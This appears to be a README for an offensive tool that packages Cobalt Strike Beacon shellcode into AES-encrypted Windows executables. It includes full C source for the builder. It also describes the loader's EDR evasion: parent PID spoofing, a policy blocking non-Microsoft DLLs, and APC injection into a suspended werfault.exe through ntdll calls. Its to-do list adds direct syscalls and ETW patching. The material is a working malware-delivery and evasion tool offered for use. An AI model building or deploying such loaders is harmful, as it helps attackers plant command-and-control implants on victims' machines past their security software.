Custom shellcode runner builder w/ CobaltStrike integration.
Compile Builder.c using gcc:
gcc -o Builder Builder.c
Edit the .cna script and replace the $builder variable at the top with the full path to the Builder executable you just compiled. Make sure you keep the compiled Builder program in the same folder as everything else in this repo!
Load the .cna script into Cobalt Strike. A "Custom Builder" menu item should appear on the toolbar. Follow the menus to create your payload.
How it works
The aggressor script exports a stageless Cobalt Strike Beacon as raw shellcode (a .bin file) and passes that file, together with the target architecture, to the Builder program as its two arguments. Builder opens the .bin, generates a random AES-128 key and IV, and encrypts the shellcode with them. It then opens the exe.c template, places the encrypted shellcode, the key and the IV into it, and saves the result as customexe.c. Finally it invokes the mingw compiler that matches the requested architecture and writes the compiled payload to the location chosen in the Cobalt Strike menu. Note that the key and IV are compiled into the resulting executable, so the encryption only keeps the Beacon out of static scans of the file on disk; anyone holding the binary can recover the shellcode from it.
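The Builder step above, written out as an added example (this is not the repo's Builder.c). It reads the .bin, draws a random AES-128 key and IV, encrypts the shellcode, emits the three values as C arrays ahead of the template text in customexe.c, and runs the mingw compiler for the requested architecture. AES-128-CBC with PKCS#7 padding is implemented inline so the block has no dependencies. The page does not state the real Builder's cipher mode, RNG source, array names or how it fills the template, so CBC, /dev/urandom, the names key/iv/payload and prepending the arrays to exe.c are all assumptions here.

```c
// Added example, not the repo's Builder.c: read .bin, random AES-128 key/IV,
// encrypt, emit C arrays, compile with mingw. AES-128-CBC + PKCS#7 is written
// out inline. Assumed (not stated on the page): the cipher mode, /dev/urandom
// as RNG, the array names the template consumes, and prepending the arrays to
// exe.c instead of substituting placeholders.
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
static uint8_t SBOX[256];
static uint8_t xtime(uint8_t a) { return (uint8_t)((a << 1) ^ ((a & 0x80) ? 0x1b : 0)); }
static uint8_t gmul(uint8_t a, uint8_t b) {                 // multiply in GF(2^8)
    uint8_t r = 0;
    for (; b; b >>= 1) { if (b & 1) r ^= a; a = xtime(a); }
    return r;
}
static void init_sbox(void) {                               // FIPS-197 5.1.1: inverse, then affine map
    for (int a = 0; a < 256; a++) {
        uint8_t inv = 0;
        for (int b = 1; a && b < 256; b++) if (gmul((uint8_t)a, (uint8_t)b) == 1) { inv = (uint8_t)b; break; }
        uint8_t s = inv;
        for (int i = 1; i <= 4; i++) s ^= (uint8_t)((inv << i) | (inv >> (8 - i)));
        SBOX[a] = s ^ 0x63;
    }
}
static void expand_key(const uint8_t key[16], uint8_t rk[11][16]) {
    uint8_t w[44][4], rcon = 1;
    memcpy(w, key, 16);
    for (int i = 4; i < 44; i++) {
        uint8_t t[4] = { w[i - 1][0], w[i - 1][1], w[i - 1][2], w[i - 1][3] };
        if (i % 4 == 0) {                                   // RotWord, SubWord, Rcon
            uint8_t r0 = SBOX[t[1]] ^ rcon, r1 = SBOX[t[2]], r2 = SBOX[t[3]], r3 = SBOX[t[0]];
            t[0] = r0; t[1] = r1; t[2] = r2; t[3] = r3; rcon = xtime(rcon);
        }
        for (int j = 0; j < 4; j++) w[i][j] = w[i - 4][j] ^ t[j];
    }
    memcpy(rk, w, 176);
}
static void encrypt_block(uint8_t rk[11][16], const uint8_t in[16], uint8_t out[16]) {
    uint8_t s[16], t[16];                                   // column-major state: s[row + 4*col]
    for (int i = 0; i < 16; i++) s[i] = in[i] ^ rk[0][i];
    for (int r = 1; r <= 10; r++) {
        for (int i = 0; i < 16; i++)                        // SubBytes + ShiftRows
            t[i] = SBOX[s[(i % 4) + 4 * ((i / 4 + i % 4) & 3)]];
        for (int c = 0; c < 4 && r < 10; c++) {             // MixColumns, skipped in the last round
            uint8_t *a = t + 4 * c;
            s[4 * c]     = gmul(a[0], 2) ^ gmul(a[1], 3) ^ a[2] ^ a[3];
            s[4 * c + 1] = a[0] ^ gmul(a[1], 2) ^ gmul(a[2], 3) ^ a[3];
            s[4 * c + 2] = a[0] ^ a[1] ^ gmul(a[2], 2) ^ gmul(a[3], 3);
            s[4 * c + 3] = gmul(a[0], 3) ^ a[1] ^ a[2] ^ gmul(a[3], 2);
        }
        if (r == 10) memcpy(s, t, 16);
        for (int i = 0; i < 16; i++) s[i] ^= rk[r][i];      // AddRoundKey
    }
    memcpy(out, s, 16);
}
size_t aes128_cbc_encrypt(const uint8_t key[16], const uint8_t iv[16],
                          const uint8_t *in, size_t len, uint8_t *out) {  // PKCS#7; out needs len + 16 bytes
    uint8_t rk[11][16], blk[16], prev[16];
    size_t pad = 16 - len % 16, total = len + pad;
    init_sbox(); expand_key(key, rk); memcpy(prev, iv, 16);
    for (size_t off = 0; off < total; off += 16) {
        for (int i = 0; i < 16; i++)
            blk[i] = ((off + i < len) ? in[off + i] : (uint8_t)pad) ^ prev[i];
        encrypt_block(rk, blk, prev);
        memcpy(out + off, prev, 16);
    }
    return total;
}
const char *pick_compiler(const char *arch) {                // mingw-w64 cross compiler per architecture
    return strcmp(arch, "x64") == 0 ? "x86_64-w64-mingw32-gcc" : "i686-w64-mingw32-gcc";
}
static void emit_array(FILE *f, const char *name, const uint8_t *buf, size_t n) {
    fprintf(f, "unsigned char %s[%zu] = {", name, n);
    for (size_t i = 0; i < n; i++) fprintf(f, "%s0x%02x", i ? "," : "", buf[i]);
    fprintf(f, "};\n");
}
static long slurp(const char *path, uint8_t **buf) {        // whole file into a malloc'd buffer, -1 on error
    FILE *f = fopen(path, "rb"); if (!f) return -1;
    fseek(f, 0, SEEK_END); long n = ftell(f); rewind(f);
    *buf = malloc((size_t)n + 1); if (fread(*buf, 1, (size_t)n, f) != (size_t)n) n = -1;
    fclose(f);
    return n;
}
int main(int argc, char **argv) {                           // Builder <beacon.bin> <x64|x86> <output.exe>
    uint8_t *sc = NULL, *tpl = NULL, *ct, key[16], iv[16];
    FILE *rnd = fopen("/dev/urandom", "rb"), *out;
    long n = argc == 4 ? slurp(argv[1], &sc) : -1, tn = slurp("exe.c", &tpl);
    if (n < 0 || tn < 0 || !rnd || fread(key, 1, 16, rnd) != 16 || fread(iv, 1, 16, rnd) != 16) return 1;
    fclose(rnd); ct = malloc((size_t)n + 16);
    size_t ctlen = aes128_cbc_encrypt(key, iv, sc, (size_t)n, ct);
    if (!(out = fopen("customexe.c", "w"))) return 1;
    emit_array(out, "key", key, 16); emit_array(out, "iv", iv, 16); emit_array(out, "payload", ct, ctlen);
    fwrite(tpl, 1, (size_t)tn, out); fclose(out);           // template text follows the generated arrays
    char cmd[1024];
    snprintf(cmd, sizeof cmd, "%s -o \"%s\" customexe.c", pick_compiler(argv[2]), argv[3]);
    return system(cmd);
}
```

Run it as `./Builder beacon.bin x64 payload.exe` from the directory holding exe.c. The AES core is checked against the FIPS-197 Appendix C.1 vector; with a zero IV the first CBC block equals that known ciphertext, which is the quickest way to confirm the cipher before trusting the generated binary.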
The current template (exe.c) creates a new werfault.exe process with a spoofed parent PID and the "block non-Microsoft binaries" process mitigation policy enabled, which prevents DLLs not signed by Microsoft (most EDR user-mode hooking DLLs among them) from loading into the new process. The parent is chosen at run time from the integrity level of the process the payload is running in: at high integrity, winlogon.exe is selected as the parent; otherwise explorer.exe is. The conditional matters because PPID spoofing needs a handle to the chosen parent with PROCESS_CREATE_PROCESS access, which a medium-integrity process cannot obtain for winlogon.exe. werfault.exe is created suspended, the shellcode is written into it, and a user APC pointing at the shellcode is queued on its main thread (NtQueueApcThread) before the thread is resumed, so the shellcode runs as the thread starts. All API calls the runner makes for the injection go through the NT APIs in ntdll rather than the Win32 wrappers.
To do
- Integrate Direct Syscalls
- Disable EtwEventWrite
- Add DLL template